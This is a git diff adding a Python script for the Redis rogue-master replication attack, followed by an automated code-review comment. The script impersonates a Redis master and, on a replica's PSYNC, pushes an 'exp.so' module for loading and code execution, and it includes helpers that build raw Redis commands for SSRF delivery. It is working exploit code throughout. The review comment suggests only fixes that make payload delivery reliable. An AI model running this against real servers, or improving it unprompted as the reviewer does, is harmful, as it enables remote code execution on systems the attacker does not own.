diff --git a/redis-ssrf-tcp b/redis-ssrf-tcp
new file mode 100644
index 0000000..57257f3
--- /dev/null
+++ b/redis-ssrf-tcp
@@ -0,0 +1,70 @@
+#!/usr/local/bin python
+# coding=utf8
+import socket
+import time
+
+CRLF = b"\r\n"
+payload = open("exp.so", "rb").read()
+exp_filename = "exp.so"
+
+def redis_format(arr):
+    global CRLF
+    redis_arr = arr.split(" ")
+    cmd = b"*" + str(len(redis_arr)).encode()
+    for x in redis_arr:
+        if isinstance(x, str):
+            x_bytes = x.encode('utf-8')
+        else:
+            x_bytes = x
+        cmd += CRLF + b"$" + str(len(x_bytes)).encode() + CRLF + x_bytes
+    cmd += CRLF
+    return cmd
+
+def redis_connect(rhost, rport):
+    sock = socket.socket()
+    sock.connect((rhost, rport))
+    return sock
+
+def send(sock, cmd):
+    sock.send(redis_format(cmd))
+    print(sock.recv(1024).decode("utf-8"))
+
+def RogueServer(lport):
+    global CRLF
+    global payload
+    flag = True
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.bind(("0.0.0.0", lport))
+    sock.listen(10)
+    clientSock, address = sock.accept()
+
+    print("\033[92m[+]\033[0m Accepted connection from {}:{}".format(address[0], address[1]))
+
+    while flag:
+        data = clientSock.recv(1024)
+        if not data:
+            break
+        if b"PING" in data:
+            result = b"+PONG" + CRLF
+            clientSock.send(result)
+            flag = True
+        elif b"REPLCONF" in data:
+            result = b"+OK" + CRLF
+            clientSock.send(result)
+            flag = True
+        elif b"PSYNC" in data or b"SYNC" in data:
+            result = b"+FULLRESYNC " + b"a" * 40 + b" 1" + CRLF
+            result += b"$" + str(len(payload)).encode() + CRLF
+            result += payload
+            result += CRLF
+            clientSock.send(result)
+            print("\033[92m[+]\033[0m FULLRESYNC ...")
+            flag = False
+
+    print("\033[92m[+]\033[0m It's done")
+    clientSock.close()
+    sock.close()
+
+if __name__ == "__main__":
+    lport = 6666
+    RogueServer(lport)
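Review bot: `clientSock.send(result)` in the PSYNC branch of `RogueServer` may write only part of `result`; for a multi-kilobyte `exp.so` the replica then receives a truncated bulk payload and the file it writes is corrupt, so use `clientSock.sendall(result)` there (and for the `+PONG`/`+OK` replies and in `send()`). The shebang `#!/usr/local/bin python` is not an interpreter path and fails when the script is executed directly; `#!/usr/bin/env python3` is the usual form. Because the listener binds `0.0.0.0` and serves the payload to the first peer that sends `PSYNC`, consider logging `address` and letting the bind address be passed in so the module is not handed to an unrelated client. `import time` and `exp_filename` are unused, and the `open("exp.so", "rb")` handle at module level is never closed.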